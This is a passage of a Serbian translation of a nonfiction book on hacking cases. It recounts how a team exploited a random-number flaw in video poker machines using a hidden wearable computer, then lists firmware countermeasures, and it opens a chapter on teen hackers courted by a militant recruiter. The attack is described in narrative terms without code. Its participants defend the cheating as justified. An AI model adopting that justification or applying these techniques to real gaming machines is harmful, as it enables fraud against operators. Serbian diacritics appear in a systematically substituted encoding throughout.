omoguñila da otvore ful, kentu ili pet karata iste boje, tako da isplate ne
budu homogene i ne privlaåe paæçu. Drugi cià je da cela akcija bude
maçe oåigledna i maçe dosadna od stalnog tråkaraça do telefona pre
svake igre.
Poãto je u kazinima postojao ograniåen broj japanskih aparata,
momci su se ovaj put ustremili na ameriåku maãinu koja se viãe koristi.
Rastavili su je na isti naåin i otkrili da je proces generisaça sluåajnih
brojeva mnogo sloæeniji: aparat je koristio dva generatora koji su se
kombinovali, umesto samo jednog. “Programeri su bili mnogo svesniji
moguñnosti upada hakera”, zakàuåio je Aleks.
Ali i ovde su åetvorica otkrila bitnu greãku projektanata. “Verovatno
su na papiru proåitali da se nasumiånost poveñava ako dodate drugi re-
gistar, ali to su uradili pogreãno.” Da bi se odredila bilo koja karta, broj
iz prvog generatora sluåajnih brojeva sabiran je s brojem iz drugog.
Da bi ovo ispravno funkcionisalo, drugi generator bi morao da
“kruæi” – tj. da meça svoju vrednost – nakon deàeça svake karte. Pro-
jektanti to nisu uradili; programirali su drugi registar da kruæi na poået-
ku svakog deàeça, pa se za svaku kartu u jednom deàeçu rezultatu 13
prvog registra dodaje isti broj.

Poglavlje 1: Hakerisanjem kazina do milion dolara


Koriãñeçe dva registra bio je izazov za Aleksa – “zadatak iz kriptolo-
gije”. Liåilo mu je na korake koji su se ranije koristili u ãifrovaçu poru-
ka. Mada je znao poneãto o toj temi, to nije bilo dovoàno da pronaœe
reãeçe, pa je poåeo da putuje do obiliæeçe univerzitetske biblioteke i
istraæuje.
Da su projektanti paæàivije proåitali neke kçige o sistemima
ãifrovaça, ne bi napravili ovu greãku. Takoœe, trebalo je da
budu metodiåniji prilikom testiraça sistema da bi ga razbili
onako kako smo ga mi razbili.
Svaki student koji je diplomirao raåunarske nauke verovatno
bi mogao da napiãe kôd koji bi radio ono ãto smo mi pokuãa-
vali da uradimo, åim biste mu rekli ãta se traæi. Najãkakàiviji
deo odnosio se na pronalaæeçe algoritama koji bi brzo obavili
pretragu i u roku od nekoliko sekundi rekli ãta se deãava. Ako
biste to naivno uradili, pronalaæeçe reãeça moglo bi trajati
nekoliko sati.
Mi smo priliåno dobri programeri, i svi i daàe zaraœujemo od
tog posla, pa smo doãli do nekih vrlo maãtovitih optimizacija.
Ipak, ne bih to nazvao trivijalnostima.
Señam se sliåne greãke koju je napravio programer kompanije Norton
(pre nego ãto ga je Symantec kupio) radeñi na çihovom proizvodu Dis-
kreet, programu koji je korisniku omoguñavao da pravi ãifrovane virtuel-
ne ureœaje. On je pogreãno ugradio algoritam – a moæda je to uradio i
namerno – pa je prostor za kàuå ãifre smaçen sa 56 bitova na 30. Åak i
u to vreme, bilo je moguñe “na silu” pogoditi 30-bitni kàuå. Svako ko je
koristio ovaj proizvod neosnovano se oseñao bezbednim: napadaå je
mogao da otkrije kàuå u razumnom vremenskom periodu i doœe do
podataka. Tim je otkrio istu vrstu greãke u programskom kodu aparata.
Dok su radili na raåunarskom programu koji bi im omoguñio da do-
biju na novoj ciànoj maãini, momci su pritiskali i Aleksa da osmisli pri-
stup koji neñe zahtevati da tråe do govornice. Inspiraciju za reãeçe
pronaãli su na stranama kçige Eudaemonic Pie : “nosivi” raåunar. Aleks
je izumeo sistem saåiçen od minijaturnog kompjutera, napravàenog
14 oko male mikroprocesorske ploåe koju su Majk i Marko pronaãli u ka-
talogu. Uz çu je iãlo i kontrolno dugme koje je moglo stati u cipelu, i
Umeñe provale

beãumni vibrator poput onih iz danaãçih mobilnih telefona. Sistem su


zvali svojim “dæepnim kompjuterom”.
“Morali smo da smislimo kako da ga napravimo na malom åipu s
malom memorijom”, priåa Aleks. “Napravili smo fin hardver, pa je sve
moglo da stane u cipelu i bilo je ergonomskog oblika.” (“Ergonomski”
je u ovom sluåaju znaåilo da je ureœaj bio dovoàno mali da moæete ho-
dati bez hramaça!)

Novi napad
Tim je poåeo da isprobava novu ãemu, a to je priliåno uticalo na çiho-
ve æivce. Naravno, viãe nije bilo sumçivog tråkaça do govornice pre
svakog osvajaça novca. Ali, i pored svih generalnih proba u çihovoj
“kancelariji”, premijera je bilo izvoœeçe pred priliåno velikom publi-
kom uvek sumçiåavih àudi iz obezbeœeça.
Ovaj put program je napravàen tako da duæe mogu da sede za jed-
nim aparatom, osvajajuñi viãe maçih, i maçe sumçivih svota. Aleks i
Majk se priseñaju napetosti dok opisuju kako je sistem radio.
Aleks: Obiåno bih raåunar stavàao u dæep, u neãto ãto je liåilo
na mali tranzistorski radio. Sproveo bih æicu od raåunara u
åarapu i u prekidaå koji se nalazio u cipeli.
Majk: Ja sam svoj lepio za ålanak. Prekidaåe smo napravili od
komadiña ploåe za konstruisaçe modela elektronskih kola
(engl. breadboard). Komadi su bili kvadratiñi strane oko jedan
inå, s minijaturnim dugmetom. Zaãili smo i paråe lastiãa koje
ñe iñi oko palca. Onda iseåete rupu u uloãku Dr. Sholl da bi
ureœaj stojao mirno u cipeli. Bilo je neudobno samo ako ste ga
nosili ceo dan – tada je postajalo pravo muåeçe.
Aleks: I onda uœete u kazino i pokuãavate da izgledate smi-
reno, ponaãate se kao da nema niåega, kao da vam pantalone
nisu pune æica. Odete tamo i poånete da igrate. Imali smo
ãifru, kao Morzeova azbuka. Ubacite pare i napravite neãto
kredita da ne biste morali stalno da ubacujete novåiñe, i poå-
nete da igrate. Oznake za podeàene karte unesete pritiskajuñi 15
dugme u cipeli.

Poglavlje 1: Hakerisanjem kazina do milion dolara


Signal od dugmeta u cipeli odlazi do raåunara u dæepu panta-
lona. Za ranije maãine trebalo je sedam ili osam karata da
biste sinhronizovali raåunar. Aparat podeli pet karata,
povuåete joã tri, ãto je uobiåajena stvar. Na primer, zadræite
par, a zamenite ostale tri, i dobijete osam karata.
Majk: Kôd koji ste ukucavali preko dugmeta u cipeli bio je
binaran i koristio je tehniku komprimovaça sliånu onome ãto
se naziva Hafmanov kôd. Tako je dug pa kratak pritisak
oznaåavao jedan-nula, ãto je binarna oznaka za dva. Dva
duga pritiska bila su jedan-jedan, binarna oznaka za tri, itd.
Ni za jednu kartu nam nije trebalo viãe od tri pritiska.
Aleks: Ako ste dugme dræali pritisnuto tri sekunde, to je zna-
åilo otkazivaçe. I [raåunar] se odazivao – na primer, dup-
dup-dup je znaåilo “OK, spreman sam za unos”. Unoãeçe
podataka smo veæbali – morali smo da se koncentriãemo i
uåimo kako se to radi. Nakon nekog vremena, mogli smo da
ukucavamo i dok smo razgovarali sa osobàem u kazinu.
Poãto bih uneo kôd i identifikovao oko osam karata, to je bilo
dovoàno za sinhronizovaçe sa oko 99 procenata sigurnosti.
Otprilike u roku od nekoliko sekundi do minut, raåunar bi
triput zazujao.
Spreman sam za akciju.
Raåunar u dæepu pronaãao je mesto u algoritmu koje predstavàa upra-
vo podeàene karte. Poãto je çegov algoritam bio isti kao onaj u video po-
ker aparatu, za svako novo deàeçe raåunar je “znao” kojih pet dodatnih
karata åeka nakon ãto igraå izabere karte koje ñe odbaciti, i signalizirao je
koje karte treba zadræati da bi se osvojio dobitak. Aleks je nastavio:
Raåunar vam javàa ãta da uradite tako ãto ãaàe signale vibra-
toru u vaãem dæepu. Vibratore smo nabavili besplatno tako ãto
smo ih iãåupali iz starih pejdæera. Ako treba da zadræite treñu
i petu kartu, kompjuter bi se oglasio sa bip, bip, biiip, bip,
16 biiip, ãto ste oseñali kao vibracije u svom dæepu.
Izraåunali smo da, ako igramo paæàivo, imamo izmeœu 20 i
Umeñe provale

40 procenata dobiti, ãto znaåi prednost od 40 procenata u sva-


kom deàeçu. To je odliåno – najboài svetski igraåi blek dæeka
ostvare oko dva i po procenta.
Ako sedite za aparatom u koji se ubacuje 5 dolara i odjednom
ubacujete po pet kovanica, dvaput u minutu, moæete zaraditi
25 dolara za minut. Za pola sata mogli biste lako zaraditi
1.000 dolara. Svaki dan se nekome tako posreñi. Oko 5 pro-
cenata igraåa koji sede i igraju pola sata mogli bi postiñi toliko.
Ali to im se ne deãava svaki put. Mi smo bili u tih 5 procenata
kad god bismo seli.
Svaki put kada bi neko od çih osvojio veñu sumu u jednom kazinu,
preãao bi u drugi. Obiåno su uzimali po åetiri ili pet dobitaka zaredom.
Kada bi se posle mesec dana vratili u taj kazino, posetili bi ga u drugo
doba dana da bi zatekli drugu smenu osobàa, àude koji ih neñe prepo-
znati. Poåeli su da poseñuju i kazina u drugim gradovima – Rinou, At-
lantik Sitiju itd.
Putovaça, kockaçe i osvajaçe, postepeno su postali rutina. Meœu-
tim, jednom prilikom Majk je mislio da je doãao trenutak od kog su svi
strepeli. Upravo se naoãtrio i prvi put je igrao na aparatu u koji se uba-
cuje 25 dolara, ãto je poveñavalo napetost – ãto je vrednost maãine veña,
to vas paæàivije posmatraju.
Bio sam pomalo nervozan, ali stvari su iãle boàe nego ãto sam
oåekivao. Osvojio sam oko 5.000 dolara za relativno kratko
vreme. A onda me je jedan ogroman tip potapãao po ramenu.
Pogledao sam ga oseñajuñi blagu muåninu u stomaku. Pomi-
slio sam: “To je to”.
“Primetio sam da veñ neko vreme igrate”, rekao je. “Æelite li
roze ili zelenu?”
Da sam to bio ja, zapitao bih se: “Ãta – da izaberem boju koje æelim
da budem kada me prebiju na mrtvo ime?” Mislim da bih ostavio sav
svoj novac i pokuãao da zbriãem. Majk kaæe da je veñ bio dovoàno is-
kusan da ostane smiren.
Åovek je rekao: “Æelimo da vam poklonimo ãoàu za kafu.” 17
Majk je odabrao zelenu.

Poglavlje 1: Hakerisanjem kazina do milion dolara


Marko je imao sopstveni napet momenat. Åekao je na dobitno
deàeçe kada mu je priãao nadzornik kog nije primetio. “Udvostruåili ste
sumu na pet hiàada dolara – baã imate sreñe”, rekao je iznenaœeno. Starija
gospoœa za susednim aparatom progovorila je hrapavim glasom puãaåa:
“Nije to... bila... sreña.” Nadzornik se ukoåio, i postao sumçiåav. “To je
bila petàa”, zagraktala je. Nadzornik se nasmeãio i otiãao daàe.
Tokom oko tri godine, momci su naizmeniåno obavàali legalne
poslove savetovaça kako bi oåuvali svoje veãtine i kontakte, i povreme-
no punili dæepove za poker aparatima. Kupili su joã dva aparata, ukàu-
åujuñi i najviãe koriãñen model video pokera i nastavili da poboàãavaju
svoj softver.
Na putovaçima je svaki od tri ålana tima iãao u razliåit kazino, nisu
iãli “u åoporu”, priåao je Aleks. “Tako smo otiãli samo jednom ili dvaput,
ali to je bilo glupo.” Iako su se dogovorili da ñe jedan drugom javàati ãta
nameravaju, povremeno bi se neko od çih iskrao u kockarske gradove ne
prijavàujuñi ostalima. Igrali su samo u kazinima, nikad na mestima kao
ãto su dragstori ili supermarketi, jer su tamo “dobici uglavnom vrlo mali”.

Uhvañen!
Aleks i Majk su se trudili da se disciplinovano dræe “odreœenih pravila
koja ñe sigurno smaçiti verovatnoñu da nas primete. Na primer, pazili
smo da nikada ne uzimamo previãe novca na istom mestu, da na istom
mestu nikada ne osvajamo novac previãe åesto, da ne uzimamo novac
mnogo dana zaredom.”
Ali Majk je tu disciplinu shvatao ozbiànije i smatrao je da druga
dvojica nisu dovoàno oprezni. Viãe je voleo da osvaja neãto maçe nov-
ca na sat, ali da izgleda kao i drugi tipiåni igraåi. Ako bi deàeçem do-
bio dva keca, a kompjuter mu rekao da odbaci jednog ili oba keca da bi
dobio joã boàe karte – na primer tri æandara – on to nije radio. U svim
kazinima postoje kamere kojima upravàa obezbeœeçe smeãteno iznad
dvorane za kockaçe. One se mogu okretati, fokusirati i zumirati u po-
trazi za prevarantima, podmiñenim sluæbenicima kazina i drugima koji
nisu uspeli da odole tolikom novcu. Ako bi se desilo da neko iz obez-
beœeça viri u Majkov aparat, odmah bi znao da tu nisu åista posla – ni-
18 jedan razuman igraå ne bi odbacio par keåeva. Niko ko ne vara ne bi
pomislio da slede joã boàe karte.
Umeñe provale

Aleks nije imao tako visoke standarde. Markovi su bili joã niæi.
“Marko je bio priliåno drzak” po Aleksovom miãàeçu:
On je vrlo pametan tip, samouk, nikada nije zavrãio sredçu
ãkolu, ali je bio jedan od onih sjajnih Istoånoevropàana. I bio
je vrlo uoåàiv.
Znao je sve o raåunarima, ali je umislio da su àudi zaposleni
u kazinima glupi. Nije bilo teãko pomisliti tako neãto s obzi-
rom na to da smo uspevali da im izvuåemo toliki novac. Pa
ipak, åini mi se da je postao previãe samouveren.
Previãe se osilio, a nije se ni uklapao u profil tipiånog igraåa jer
je izgledao kao klinac iz inostranstva. Mislim da je zato budio
sumçe. Takoœe, nije iãao sa devojkom ili suprugom, koja bi
pomogla da se boàe uklopi.
Mislim da je na kraju poåeo da radi stvari koje su privlaåile
paæçu. Takoœe, kako je vreme prolazilo, svi smo se okuraæili,
pa smo poåeli da igramo na skupàim aparatima koji su davali
boàe dobitke, ãto je operaciju åinilo riziånijom.
Iako se Majk s tim ne slaæe, Aleks je nagovestio da su sva trojica voleli
da rizikuju i da su stalno pomerali granice proveravajuñi koliko daleko
mogu da idu. O tome je rekao: “Jednostavno, stalno poveñavate rizik.”
Doãao je dan kada je Marko u jednom trenutku sedeo za aparatom u
kazinu, a u sledeñem je bio okruæen gomilom àudi iz obezbeœeça koji
su ga vukli i gurali u zadçu sobu za razgovor. Aleks je prepriåao dogaœaj.
Bilo je straãno jer ste stalno sluãali priåe o tim tipovima koji
mlate àude kao volove u kupusu. Oni su bili åuveni po geslu
“J_ã policiju, sami ñemo se postarati za ovo.”
Marko je bio uplaãen, ali on je vrlo åvrst lik. Na neki naåin mi
je drago ãto je baã on uhvañen, ako je iko od nas morao da
padne, jer mislim da je on bio najsposobniji da se izbori s tom
situacijom. Koliko znam, sliåne stvari je preæiveo u Istoånoj
Evropi.
Pokazao je lojalnost i nije nas izdao. Nije pomiçao partnere
19
niti bilo ãta sliåno. Bio je nervozan i uznemiren, ali je ostao
åvrst pred paàbom i rekao im je da je radio sam.

Poglavlje 1: Hakerisanjem kazina do milion dolara


Rekao je: “Åekajte, da li sam ja uhapãen, jeste li vi policija, u
åemu je stvar?”
Bilo je to ispitivaçe kao u kriminalistiåkoj sluæbi, osim ãto ti
àudi nisu bili policija i nisu imali nikakav stvaran autoritet,
ãto je pomalo åudno. Nastavili su da ga ispituju, ali ga nisu
stvarno maltretirali.
Snimili su mu anfas i profil, i oduzeli mu kompjuter i sav novac koji
je imao – oko 7.000 dolara u keãu. Nakon oko jednog sata ispitivaça,
ili moæda duæe – bio je previãe uzrujan da bi bio siguran koliko je trajalo
– pustili su ga.
Marko je pozvao svoje partnere na putu kuñi. Zvuåao je izbezumàe-
no. Rekao je: “Da vam ispriåam ãta se desilo. Zeznuo sam stvar.”
Majk je odmah otiãao u çihov ãtab. “Aleks i ja smo ãiznuli kada smo
åuli ãta se desilo. Ja sam poåeo da rastavàam aparate i bacam delove
svud po gradu.”
Aleks i Majk su bili àuti ãto je Marko nepotrebno rizikovao. Nije
hteo da postavàa dugme u cipelu kao çih dvojica, tvrdoglavo insistra-
juñi da ureœaj nosi u dæepu jakne i pokreñe ga rukom. Aleks je opisao
Marka kao tipa koji je “mislio da su àudi iz obezbeœeça toliko glupi da
je mogao pod çihovim nosem da bude sve drskiji.”
Aleks je ubeœen da zna ãta se desilo, iako nije bio prisutan. (Zapravo,
çih trojica nisu znali da je Marko otiãao u kazino, uprkos dogovoru da
se meœusobno obaveãtavaju o planovima.) Po Aleksovom miãàeçu,
“Videli su da on osvaja nemoguñe sume i da se neãto åudno deãava s
çegovom rukom.” Marko prosto nije brinuo o tome ãta bi moglo skre-
nuti paæçu osobàa i pobuditi sumçu.
To je bio kraj i za Aleksa, mada nije skroz siguran da su i ostali pre-
stali da varaju. “Na poåetku smo odluåili da, ako iko od nas bude uh-
vañen, svi prestajemo.” Rekao je: “Koliko ja znam, svi smo se toga
pridræavali.” Ubrzo zatim je, maçe siguran, dodao: “Bar ja jesam.”
Majk se sloæio, ali nijedan od çih nikada to pitaçe nije direktno posta-
vio Marku.
Kazina obiåno ne tuæe napadaåe poput çih åetvorice. “Razlog za to
20 je ãto ne æele da objave da imaju ovakve slabosti”, objaãçava Aleks.
Obiåno se zavrãava reåima: “Izgubi se pre zalaska sunca. Pustiñemo te
Umeñe provale

ako obeñaã da viãe nikada neñeã kroåiti u ovaj kazino.”

Epilog
Oko ãest meseci kasnije, Marko je primio pismo u kom je pisalo da pro-
tiv çega neñe biti podneta tuæba.
Njih åetvorica su i daàe prijateài, mada danas nisu toliko bliski.
Aleks misli da je u ovoj avanturi zaradio oko 300.000 dolara, a deo tog
novca otiãao je Lariju, kao ãto su se dogovorili. Tri partnera koja su iãla
u kazina i preuzela sav rizik, prvo su se dogovorila da ñe podeliti novac
na jednake delove, ali Aleks misli da su Majk i Marko verovatno uzeli
oko 400.000 do pola miliona dolara svaki. Majk nije potvrdio da je do-
bio viãe od 300.000 dolara, ali priznaje da je Aleks verovatno izvukao
maçe od çega.
Radili su oko tri godine. Uprkos novcu, Aleks je bio sreñan kada je
bilo gotovo: “Na neki naåin, osetio sam olakãaçe. Sva zabava je iãåezla.
To nam je postalo kao posao. I to riziåan.” Ni Majku nije bilo krivo ãto
se sve zavrãilo, i blago se æalio da je “postalo nekako naporno”.
Obojica su na poåetku oklevali da ispriåaju svoju priåu, ali su sa uæi-
vaçem prihvatili zadatak. A zaãto i ne bi – tokom desetak godina otkako
se sve desilo, nijedan od çih åetvorice nikada nikome nije ni proãaputao
o tim dogaœajima osim suprugama i devojci, koje su bile deo cele stvari.
Na neki naåin, bilo je olakãaçe ispriåati sve po prvi put, pod zaãtitom
dogovora o potpunoj anonimnosti. Oåigledno su uæivali u otkrivaçu
detaàa, a Majk je priznao: “To je bila jedna od najuzbudàivijih stvari
koje sam ikada uåinio.”
Aleks verovatno govori u ime svih iznoseñi svoj stav o ovoj ludoriji:
Ne oseñam se nimalo loãe zbog novca koji smo uzeli. To je samo
kap u moru novca u toj industriji. Da budem iskren, nikada
nismo oseñali griæu savesti, jer su to kazina.
Sve smo lako racionalizovali. Krali smo od kazina koji su krali
starim gospoœama nudeñi igre u kojima ne mogu da dobiju.
Vegas je kao mesto u kom su àudi utaknuti u maãine za
isisavaçe novca, i one im isisavaju æivot – novåiñ po novåiñ.
Oseñali smo se kao da se svetimo Velikom Bratu, a ne kao da
21
nekoj jadnoj starici otimamo dæek pot.
Napravili su igru u kojoj se kaæe “Izaberi odgovarajuñe karte i

Poglavlje 1: Hakerisanjem kazina do milion dolara


dobiñeã novac”. Mi smo birali odgovarajuñe karte. Jedino ãto
oni nisu oåekivali da to ikome poœe za rukom.
Aleks kaæe da tako neãto danas ne bi pokuãao. Meœutim, çegovi ra-
zlozi ñe vas moæda iznenaditi: “Pronaãao sam druge naåine da doœem
do novca. Da je moja finansijska situacija ista kao tada, verovatno bih
pokuãao opet.” Misli da je ono ãto su uradili sasvim opravdano.
U ovoj igri maåke i miãa, maåka stalno uåi nove trikove koje miã iz-
vodi i preduzima odgovarajuñe mere. Slot maãine danas koriste mnogo
boài softver, pa momci nisu sigurni da li bi uspeli ponovo da ih provale.
Ipak, nikada neñe postojati savrãeno reãeçe za bilo koje pitaçe teh-
noloãke bezbednosti. Aleks je taj problem slikovito predstavio: “Svaki
put kada neki [programer] kaæe: ’Niko se neñe muåiti oko toga‘, naœe se
klinac u Finskoj raspoloæen da se pomuåi.”
I to ne samo u Finskoj, nego i u Americi.

SAÆETAK
Tokom devedesetih, kazina i projektanti kockarskih aparata nisu shva-
tali neke stvari koje su kasnije postale oåigledne. Generator pseudo-
sluåajnih brojeva ne generiãe zaista nasumiåne brojeve. Umesto toga, on
skladiãti listu nasumiåno poreœanih brojeva. U ovom sluåaju, to je ve-
oma duga lista: sa stepenom od 2 do 32, ili otprilike milijardu brojeva.
Na poåetku ciklusa, program nasumiåno bira mesto u listi. Ali nakon
toga, sve dok ne poåne nov ciklus igre, on koristi sledeñe brojeve sa liste,
jedan za drugim.
Reverznim inæeçeringom (tj. povratnom analizom) softvera momci
su doãli do liste. Sa bilo koje poznate taåke u “nasumiånoj” listi, oni su
mogli da utvrde sledeñi broj na listi, a pomoñu dodatnog poznavaça
brzine ponavàaça za konkretnu maãinu, mogli su da odrede koliko ñe
minuta i sekundi proñi pre nego ãto aparat prikaæe fleã rojal.

PROTIVMERE
Proizvoœaåi svakog proizvoda koji koristi ROM åipove i softver moraju
predvideti bezbednosne probleme. A svaka kompanija koja koristi pro-
22 izvode zasnovane na softveru i raåunarima – ãto danas znaåi gotovo sva-
ka kompanija, sve do radçi s jednim åovekom – biñe u opasnosti ako
pretpostavi da su tvorci sistema razmiãàali o svim çegovim slabostima.
Umeñe provale

Programeri softvera u japanskim slot aparatima napravili su greãku jer


nisu razmiãàali mnogo unapred o svim vrstama napada koji bi mogli
biti izvedeni. Nisu preduzeli nikakve mere bezbednosti kojima bi
spreåili àude da doœu do firmvera. Trebalo je da predvide da ñe neko
doñi do aparata, ukloniti ROM åip, proåitati firmver i doñi do pro-
gramskih instrukcija koje aparatu govore kako da radi. Åak i ako su raz-
motrili tu moguñnost, verovatno su pretpostavili da sâmo poznavaçe
naåina rada maãine nije dovoàno, i smatrali da ñe sloæenost izraåuna-
vaça potrebnih za provaàivaçe generatora sluåajnih brojeva osuditi
svaki takav pokuãaj na neuspeh. To je danas moæda i taåno, ali u ono
vreme nije bilo.
Recimo da vaãa kompanija prodaje hardverske proizvode koji sadræe
kompjuterske åipove. Ãta treba da uradite da biste obezbedili adekvatnu
zaãtitu protiv suparnika koji hoñe da zaviri u vaã softver, protiv strane
kompanije koja hoñe da napravi jeftinu kopiju, ili hakera koji hoñe da
vas prevari?
Prvi korak: oteæajte dolazak do firmvera. Za to postoji nekoliko
naåina, ukàuåujuñi sledeñe:
 Kupujte åipove koji su napravàeni tako da su osigurani od
napada. Nekoliko kompanija prodaje åipove dizajnirane speci-
jalno za situacije kada postoji velika opasnost od napada.
 Koristite pakovaçe “chip on-board” – dizajn u kom je åip
ugraœen u ploåu sa elektronskim kolima i ne moæe se izdvojiti
kao poseban element.
 Zapeåatite åip epoksidnom smolom, pa ñe se slomiti ako neko
pokuãa da ga ukloni s ploåe. Da biste poboàãali ovu tehniku, u
smolu dodajte aluminijumski prah. Ukoliko napadaå pokuãa da
ukloni åip zagrevaçem smole, aluminijum ñe ga uniãtiti.
 Koristite dizajn “Ball Grid Array” (BGA). U takvom rasporedu
konektori ne izlaze iz bokova åipa, veñ ispod çega, pa je teãko,
åak i nemoguñe, uhvatiti tok signala iz åipa dok je on postavàen
na ploåu.
Joã jedna protivmera je uklaçaçe svih oznaka sa åipa. Time ñete na-
padaåa liãiti informacija o proizvoœaåu i vrsti åipa. 23
Priliåno uobiåajen postupak, koji su koristili proizvoœaåi aparata iz
ove priåe, zahteva koriãñeçe kontrolnih zbirova (“heãiraçe”) – ukàuåi-

Poglavlje 1: Hakerisanjem kazina do milion dolara


vaçe rutine check-sum u softver. Ukoliko se program izmeni, kontrol-
ni zbir neñe biti ispravan i softver neñe pokrenuti ureœaj. Meœutim,
umeãniji hakeri koji su upoznati sa ovim pristupom, jednostavno
pregledaju softver da bi videli postoji li u çemu rutina check-sum, i is-
kàuåe je ukoliko je pronaœu. Znaåi, mnogo je boàe da iskoristite jednu
ili viãe metoda fiziåke zaãtite åipa.

ZAKLJUÅAK
Ukoliko je vaã firmver privatan i vredan, pregledajte najboàe izvore
podataka o bezbednosti i otkrijte koje tehnike hakeri trenutno koriste.
Prenosite najnovije informacije svojim projektantima i programerima.
I obavezno preduzmite sve odgovarajuñe korake da biste postigli najviãi
nivo bezbednosti srazmeran troãkovima koje biste mogli imati zbog
upada.
Poglavlje 2
Kad teroristi pozovu
Ne znam zaãto sam nastavio s tim. Zbog opsesivne prirode? Æeœi
za novcem? Æudçe za moñi? Mogao bih nabrojati mnogo razloga.
– ne0h

D vadesetogodiãçi haker koji se potpisuje kao Comrade (Drug)


ovih dana provodi vreme u kuñi u finom kraju Majamija, koja
pripada çemu i çegovom bratu. Otac æivi s çima, ali samo
zato ãto je brat joã uvek maloletan, a Sluæba za brigu o deci zahteva da
odrasla osoba æivi u kuñi dok deåak ne napuni 18. Brañi to ne smeta, a
tata ima svoj stan na drugom mestu, i preseliñe se u çega kad za to
doœe vreme.
Comradeova mama je umrla pre dve godine i ostavila kuñu sinovima
jer su ona i çihov otac bili razvedeni. Ostavila im je i neãto gotovine.
Njegov brat ide u sredçu ãkolu, a Comrade “samo visi po kraju”. Veñi
deo porodice to ne odobrava, ali on kaæe da ga “uopãte nije briga”. Kada
vrlo mladi dospete u zatvor – zapravo, ako ste najmlaœa osoba koja je
ikada osuœena kao haker na osnovu federalne optuænice – iskustvo ñe
verovatno promeniti vaã sistem vrednosti.
Naravno, hakerisaçe ne poznaje meœunarodne granice, pa nije åud-
no ãto je Comradeov prijateà haker, ne0h (nio), otprilike 4.500 km da-
leko. Hakerisaçe ih je zbliæilo i skrenulo ih na stranputicu koja je,
ispostavilo se, vodila sluæeçu interesima meœunarodnog terorizma pre-
ko upada u veoma osetàive raåunarske sisteme. Danas nije lako nositi se
s tim teretom.

25
Godinu dana stariji od Comradea, ne0h kaæe: “Koristio sam raåu-
nare otkad sam mogao da dohvatim tastaturu”. Njegov otac je imao
prodavnicu raåunarske opreme i vodio je deåaka sa sobom na sastanke s
klijentima. Deåak je sedeo na oåevom krilu tokom prodaje. Do svoje je-
danaeste godine veñ je pisao dBase kôd za potrebe oåevog posla.
U meœuvremenu, ne0h je naiãao na kopiju kçige Takedown (Hyperi-
on Press, 1996) – veoma netaåan opis mojih hakerskih akcija, moje tri
godine u bekstvu, i potrage FBI-ja za mnom. ne0h je bio oåaran kçigom:
Inspirisao si me. Ti si bio moj j_ni mentor. Proåitao sam sve o
26 onome ãto si radio. Hteo sam da postanem slavan kao ti.
To ga je motivisalo da postane haker. Svoju sobu je opremio raåu-
Umeñe provale

narima, razvodnicima za umreæavaçe, gusarskom zastavom dugom dva


metra i – krenuo mojim stopama.
ne0h je poåeo da stiåe solidno hakersko znaçe i sposobnosti. Prvo je
stekao veãtine, a diskrecija je doãla kasnije. Koristeñi hakerski termin za
klince poåetnike, objasnio je: “Dok sam pisao deåje skriptove, meçao
sam matiåne strane Web prezentacija i ostavàao svoju adresu e-poãte.”
Visio je na IRC prezentacijama (engl. Internet Relay Chat, interaktivni
razgovor na Internetu) – elektronskim priåaonicama u kojima se sreñu
àudi sa zajedniåkim interesovaçima i u realnom vremenu razmeçuju
poruke o pecaçu, starim avionima, kuñnim pivarama, ili bilo kojoj od
hiàada drugih tema, ukàuåujuñi i hakerisaçe. Kada na IRC prezentaciji
unesete tekst, svi koji su u to vreme na mreæi videñe ãta ste napisali i
mogu vam odgovoriti. Mada to mnogi redovni korisnici IRC-a ne znaju,
komunikacija se lako moæe evidentirati. Te evidencije dosad verovatno
sadræe skoro isti broj reåi kao sve kçige u Kongresnoj biblioteci – a do
teksta upisanog u æurbi, bez previãe razmiãàaça o posledicama, moæe se
doñi godinama kasnije.
Comrade i ne0h su provodili vreme na nekoliko istih IRC prezentaci-
ja i tako se rodilo prijateàstvo na daàinu. Hakeri se åesto udruæuju radi
razmeçivaça informacija ili izvoœeça grupnih napada. ne0h, Comrade
i joã jedan klinac odluåili su da naprave sopstvenu grupu koju su nazvali
“Keebler Elves”. Joã nekoliko hakera je imalo pristup razgovorima grupe,
ali tri prva ålana nisu ostalima govorili o svojim napadima. “Provaàivali
smo u vladine prezentacije radi zabave”, rekao je Comrade. Proceçuje
da su provalili u “par stotina” navodno zaãtiñenih vladinih prezentacija.
Razliåite grupe hakera okupàaju se na nekoliko IRC kanala. Meœu
çima se izdvaja mreæa Efnet. To je prezentacija koju Comrade opisuje
kao “ne baã kompjutersko podzemàe – to je priliåno velika grupa serve-
ra”. Ali, na Efnetu je bilo nekih maçe poznatih kanala, mesta koja niste
mogli sami da pronaœete, veñ je za çih morao da vam kaæe drugi haker
åije ste povereçe zadobili. Ti kanali su, kaæe Comrade, bili “priliåno
ilegalni”.

Terorista Kalid baca mamac


Oko 1998, na tim “priliåno ilegalnim” kanalima, Comrade je poåeo da 27
nailazi na razgovore o tipu koji se “motao unaokolo”, a predstavàao se
kao RahulB. (Kasnije je koristio i identifikaciju Rama3456). “Svima je

Poglavlje 2: Kad teroristi pozovu


bilo poznato da je on traæio hakere koji ñe upadati u vladine i vojne ra-
åunare – prezentacije .gov i .mil”, kaæe Comrade. “Kruæile su glasine da
je on radio za Bin Ladena. To je bilo pre 11. septembra, pa Bin Laden
nije bilo ime koje ste mogli svaki dan åuti u vestima.”
Na kraju su se Comradeovi putevi ukrstili s putevima tajanstvenog åo-
veka koji ñe mu se predstaviti kao Kalid Ibrahim. “Razgovarao sam s çim
nekoliko minuta [na IRC-u] i jednom smo priåali telefonom.” Åovek je
imao strani akcenat i “definitivno je zvuåalo kao da zove iz inostranstva”.
I ne0h je stupio s çim u vezu. Kalid je s çim bio direktniji i otvo-
reniji.
Oko 1999, sa mnom je putem e-poãte u kontakt stupio åovek
koji je rekao da je militantni aktivista i da se nalazi u Pakista-
nu. Predstavio se kao Kalid Ibrahim. Rekao mi je da je radio
za pakistanske militantne grupe.
Da li bi neko u potrazi za naivnim klincima hakerima zaista sebe obe-
leæio kao teroristu – åak i pre 11. septembra? Na prvi pogled to zvuåi
apsurdno. Taj åovek je kasnije tvrdio da je iãao u ãkolu u SAD, da se i
sâm pomalo bavio hakerisaçem, i da se povezao s hakerima dok je bio u
Americi. U tom sluåaju, on je mogao znati, ili je mislio da zna, kako ha-
keri razmiãàaju. Svaki haker je do neke mere buntovnik koji æivi po
razliåitim standardima i uæiva u savladavaçu sistema. Ako hoñete da pri-
vuåete hakera, moæda i nije tako glupo objaviti da i sami krãite pravila i
da ste autsajder. Moæda bi priåa upravo tako postala uveràivija, a poten-
